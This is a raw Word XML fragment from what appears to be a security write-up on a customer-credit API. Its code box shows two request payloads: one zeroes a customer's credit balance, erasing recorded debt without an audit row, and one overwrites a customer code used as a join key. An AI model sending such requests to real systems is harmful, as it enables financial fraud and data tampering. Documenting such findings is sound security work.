                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>": 0}         → 200</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1148" name="Rectangle 1148"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="316954"/>
                            <a:ext cx="217310" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="522E9313" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">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5522" name="Rectangle 25522"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="264170" y="316957"/>
                            <a:ext cx="144873" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5FCD2FEB" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>45</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="25523" name="Rectangle 25523"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="373097" y="316957"/>
                            <a:ext cx="4128881" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5DB4396A" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">,000 LKR of debt erased, no </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>CreditTransaction</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> row written</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1150" name="Rectangle 1150"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="659854"/>
                            <a:ext cx="4128881" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="660B78B0" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>PUT /customers/</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>3 {"</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>customer_code</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>": "CUS-HIJACKED</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 xml:space="preserve"> 200</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1151" name="Rectangle 1151"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="831304"/>
                            <a:ext cx="217310" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6121E854" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">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1152" name="Rectangle 1152"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="264170" y="831304"/>
                            <a:ext cx="4273754" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6CDACA09" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">the key invoices and </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>credit_transactions</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> join on, rewritten</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="40C1BF29" id="Group 26233" o:spid="_x0000_s1165" style="width:510.25pt;height:83.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="64801,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&#10;">
                <v:shape id="Shape 1119" o:spid="_x0000_s1166" style="position:absolute;width:64801;height:10572;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6480126,105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RRxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4X/A/LCL3VTUoRja5BhWKhPdTHweOQHbPR7GzIribtr+8WBG/z8T1nnve2FjdqfeVYQTpKQBAX&#10;TldcKjjs318mIHxA1lg7JgU/5CFfDJ7mmGnX8ZZuu1CKGMI+QwUmhCaT0heGLPqRa4gjd3KtxRBh&#10;W0rdYhfDbS1fk2QsLVYcGww2tDZUXHZXq0DqIqX9r/mSYdxsPs+r43e1fVPqedgvZyAC9eEhvrs/&#10;dJyfplP4/yaeIBd/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAPDLFFHEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m19050,l6467474,v2527,,4956,477,7290,1445l6480126,5028r,1047212l6474764,1055818v-2334,967,-4763,1451,-7290,1457l19050,1057275v-2526,-6,-4956,-490,-7290,-1457c9426,1054850,7366,1053474,5580,1051694v-1787,-1792,-3163,-3851,-4130,-6183l,1038225,,19050,1450,11751c2417,9420,3793,7361,5580,5575,7366,3789,9426,2412,11760,1445,14094,477,16524,,19050,xe" fillcolor="#102b46" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6480126,1057275"/>
                </v:shape>
                <v:rect id="Rectangle 1147" o:spid="_x0000_s1167" style="position:absolute;left:1007;top:1455;width:3766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7CF15A9F" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>PUT /customers/1 {"</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>credit_balance</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>": 0}         → 200</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1148" o:spid="_x0000_s1168" style="position:absolute;left:1007;top:3169;width:217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522E9313" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">   </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 25522" o:spid="_x0000_s1169" style="position:absolute;left:2641;top:3169;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M/xwAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvhX6H5RW81U0DikbXEPoHc6yxYL09sq9JaPZtyG5N9NN3BcHjMDO/YdbpaFpxot41lhW8TCMQ&#10;xKXVDVcKvvYfzwsQziNrbC2TgjM5SDePD2tMtB14R6fCVyJA2CWooPa+S6R0ZU0G3dR2xMH7sb1B&#10;H2RfSd3jEOCmlXEUzaXBhsNCjR291lT+Fn9GwXbRZd+5vQxV+37cHj4Py7f90is1eRqzFQhPo7+H&#10;b+1cK4hnsziG651wBeTmHwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJRmMz/HAAAA3gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="5FCD2FEB" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>45</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 25523" o:spid="_x0000_s1170" style="position:absolute;left:3730;top:3169;width:4128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pakyAAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvBb/D8oTe6saUlJhmFdEWPfoPbG+P7GsSzL4N2a1J++m7QsHjMDO/YfLFYBpxpc7VlhVMJxEI&#10;4sLqmksFp+P7UwrCeWSNjWVS8EMOFvPRQ46Ztj3v6XrwpQgQdhkqqLxvMyldUZFBN7EtcfC+bGfQ&#10;B9mVUnfYB7hpZBxFL9JgzWGhwpZWFRWXw7dRsEnb5cfW/vZl8/a5Oe/Os/Vx5pV6HA/LVxCeBn8P&#10;/7e3WkGcJPEz3O6EKyDnfwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQD7KpakyAAAAN4A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="5DB4396A" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">,000 LKR of debt erased, no </w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>CreditTransaction</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> row written</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1150" o:spid="_x0000_s1171" style="position:absolute;left:1007;top:6598;width:4128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660B78B0" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>PUT /customers/</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>3 {"</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>customer_code</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>": "CUS-HIJACKED</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 xml:space="preserve"> 200</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1151" o:spid="_x0000_s1172" style="position:absolute;left:1007;top:8313;width:217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6121E854" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">   </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1152" o:spid="_x0000_s1173" style="position:absolute;left:2641;top:8313;width:4273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6CDACA09" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">the key invoices and </w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>credit_transactions</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> join on, rewritten</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F3C393" w14:textId="10A80C28" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">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second exploit only succeeded on a customer with no </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>invoices  on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"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others</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>database</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> foreign key blocked it. </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
